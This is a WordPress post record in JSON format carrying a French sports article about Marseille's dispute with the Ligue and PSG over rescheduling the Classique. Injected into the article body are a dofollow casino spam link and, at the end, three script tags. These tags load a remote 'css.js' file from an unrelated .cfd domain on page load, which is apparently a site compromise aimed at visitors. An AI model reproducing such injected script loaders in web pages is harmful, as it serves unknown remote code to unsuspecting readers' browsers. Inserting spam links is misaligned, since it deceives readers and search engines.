{"id":4031,"date":"2025-11-20T03:59:05","date_gmt":"2025-11-20T03:59:05","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=4031"},"modified":"2026-02-02T22:09:50","modified_gmt":"2026-02-02T22:09:50","slug":"om-psg-lom-tape-du-poing-sur-la-table-face-a-la-ligue-et-au-psg","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/om-psg-lom-tape-du-poing-sur-la-table-face-a-la-ligue-et-au-psg\/","title":{"rendered":"OM\/PSG \u2013 l\u2019OM tape du poing sur la table face \u00e0 la Ligue et au PSG"},"content":{"rendered":"<h1>OM\/PSG \u2013 l\u2019OM tape du poing sur la table face \u00e0 la Ligue et au PSG<\/h1>\n<h2>Un Classique sous tension avant le coup d\u2019envoi<\/h2>\n<p>Avant m\u00eame que le match ne d\u00e9bute, l\u2019affiche entre l\u2019<strong>OM<\/strong> et le <strong>PSG<\/strong> a suscit\u00e9 de vives tensions. Report\u00e9e en raison des intemp\u00e9ries qui ont frapp\u00e9 Marseille dimanche, la rencontre a \u00e9t\u00e9 fix\u00e9e \u00e0 ce lundi soir, 20 heures, au V\u00e9lodrome. Mais ce choix a provoqu\u00e9 des d\u00e9saccords entre les deux clubs et la Ligue, soucieuse d\u2019\u00e9viter une concurrence avec la c\u00e9r\u00e9monie du Ballon d\u2019Or \u00e0 Paris.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-deauville-fr.com\/casino-deauville-prime\/\" target=\"_blank\" rel=\"dofollow\">casino deauville Prime<\/a><\/strong> &#8211; Vous vous demandez quelles primes exclusives propose le Casino Deauville ? Comment profiter pleinement de ses bonus pour maximiser vos gains ? Ou encore,<\/p><\/blockquote>\n<h2>Le r\u00e8glement en faveur des Marseillais<\/h2>\n<p>Le PSG esp\u00e9rait repousser le match \u00e0 mardi pour ne pas \u00eatre \u00e9clips\u00e9 par la c\u00e9r\u00e9monie, o\u00f9 plusieurs de ses joueurs, dont Ousmane Demb\u00e9l\u00e9, sont candidats. La Ligue partageait cette inqui\u00e9tude, mais l\u2019article 548 du r\u00e8glement des comp\u00e9titions stipule qu\u2019un match interrompu pour intemp\u00e9ries doit se rejouer le lendemain. L\u2019OM s\u2019est appuy\u00e9 sur ce texte et a menac\u00e9 de saisir les instances si un autre jour \u00e9tait impos\u00e9 d&#x27;apr\u00e8s\u00a0<em>l&#x27;Equipe<\/em>.<\/p>\n<h2>La Ligue contrainte de c\u00e9der<\/h2>\n<p>Selon <em>L&#x27;Equipe<\/em>, face \u00e0 la fermet\u00e9 du club marseillais, la <strong>LFP<\/strong> a recul\u00e9. Elle assure toutefois avoir voulu \u00e9viter la co\u00efncidence entre deux \u00e9v\u00e9nements majeurs. Dans ses \u00e9changes, la direction de l\u2019OM a affich\u00e9 une position inflexible, convaincue que la r\u00e9glementation \u00e9tait de son c\u00f4t\u00e9. L\u2019institution rappelle cependant que Marseille avait r\u00e9cemment demand\u00e9 en vain le report de Lens-OM pr\u00e9vu le 25 octobre, trois jours apr\u00e8s le d\u00e9placement des Olympiens \u00e0 Lisbonne pour affronter le Sporting en Ligue des champions, ce qui avait d\u00e9j\u00e0 suscit\u00e9 des tensions.<\/p>\n<h2>Un climat politique d\u00e9j\u00e0 explosif<\/h2>\n<p>Cette pol\u00e9mique intervient alors que les relations entre Marseille et la Ligue sont particuli\u00e8rement tendues. Le propri\u00e9taire <strong>Frank McCourt<\/strong> et le pr\u00e9sident <strong>Pablo Longoria<\/strong> ont ouvertement critiqu\u00e9 le pr\u00e9sident <strong>Vincent Labrune<\/strong>, dont ils r\u00e9clament le d\u00e9part. L\u2019affaire du Classique n\u2019a fait qu\u2019exacerber ce climat conflictuel, alors que le V\u00e9lodrome s\u2019appr\u00eate \u00e0 accueillir un duel attendu dans une atmosph\u00e8re \u00e9lectrique.<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OM\/PSG \u2013 l\u2019OM tape du poing sur la table face \u00e0 la Ligue et au PSG Un Classique sous tension avant le coup d\u2019envoi Avant m\u00eame que le match ne&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-4031","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4031","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=4031"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4031\/revisions"}],"predecessor-version":[{"id":14847,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4031\/revisions\/14847"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=4031"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=4031"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=4031"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}